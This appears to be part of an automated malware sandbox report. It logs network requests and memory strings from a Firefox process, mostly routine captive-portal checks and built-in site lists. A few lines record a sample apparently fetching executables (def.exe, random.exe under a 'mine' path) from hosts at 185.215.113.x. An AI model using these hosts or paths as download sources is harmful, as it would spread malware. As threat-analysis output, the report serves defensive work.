Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_offhttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UPDATE moz_bookmarks SET position = position - 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.js*://pagead2.googlesyndication.com/pagead/*.js*fcd=true*://www.gstatic.com/firebasejs/*/firebase-messaging.js**://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true*://securepubads.g.doubleclick.net/gampad/*ad-blk*https://static.adsafeprotected.com/firefox-etp-pixel*://securepubads.g.doubleclick.net/tag/js/gpt.js*resource://gre/modules/URLDecorationAnnotationsService.sys.mjs equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://static.chartbeat.com/js/chartbeat_video.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/*://www.rva311.com/static/js/main.*.chunk.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://pub.doubleverify.com/signals/pub.js**://www.everestjs.net/static/st.v3.js**://cdn.branch.io/branch-latest.min.js**://web-assets.toggl.com/app/assets/scripts/*.jshttps://smartblock.firefox.etp/play.svg*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js*FileUtils_closeSafeFileOutputStream*://auth.9c9media.ca/auth/main.jspictureinpicture%40mozilla.org:1.0.0webcompat-reporter%40mozilla.org:1.5.1*://www.google-analytics.com/gtm/js**://connect.facebook.net/*/all.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/facebook.svgwebcompat-reporter@mozilla.org.xpi*://static.chartbeat.com/js/chartbeat.jsFileUtils_closeAtomicFileOutputStream@mozilla.org/addons/addon-manager-startup;1*://c.amazon-adsystem.com/aax2/apstag.js*://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/webtrends.min.js{e43b0010-04ba-4da6-b523-1f92580bc150} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3062161151.0000025E81CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/dom/slow-script-debug;1WebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}devtools/client/framework/devtoolsFailed to listen. Callback argument missing.Failed to execute WebChannel callback:browser.fixup.dns_first_for_single_words^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$@mozilla.org/network/protocol;1?name=defaultJSON Viewer's onSave failed in startPersistencebrowser and that URL. Falling back to Unable to start devtools server on devtools-commandkey-profiler-capturedevtools.performance.popup.feature-flagdevtools.performance.recording.ui-base-urldevtools.debugger.remote-websocketDevTools telemetry entry point failed: Got invalid request to save JSON dataNo callback set for this channel.browser.urlbar.dnsResolveFullyQualifiedNamesresource://devtools/server/devtools-server.jsFailed to listen. Listener already attached.devtools.debugger.features.javascript-tracingdevtools/client/framework/devtools-browserDevToolsStartup.jsm:handleDebuggerFlagdevtools-commandkey-javascript-tracing-togglereleaseDistinctSystemPrincipalLoaderand deploy previews URLs are allowed.resource://devtools/shared/security/socket.jsdevtools-commandkey-profiler-start-stopresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjs^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUP^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Can't invoke URIFixup in the content processisDownloadsImprovementsAlreadyMigratedhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsScheme should be either http or https^([a-z+.-]+:\/{0,3})*([^\/@]+@).+http://poczta.interia.pl/mh/?mailto=%s{33d75835-722f-42c0-89cc-44f328e56a86}https://mail.yahoo.co.jp/compose/?To=%s_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sget FIXUP_FLAGS_MAKE_ALTERNATE_URIextractScheme/fixupChangedProtocol<gecko.handlerService.defaultHandlersVersionresource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%s@mozilla.org/uriloader/web-handler-app;1browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_FORCE_ALTERNATE_URIhttps://poczta.interia.pl/mh/?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/dbus-handler-app;1http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/file-input-stream;1@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLgetCookieStoreIdForOriginAttributes equals www.yahoo.com (Yahoo)
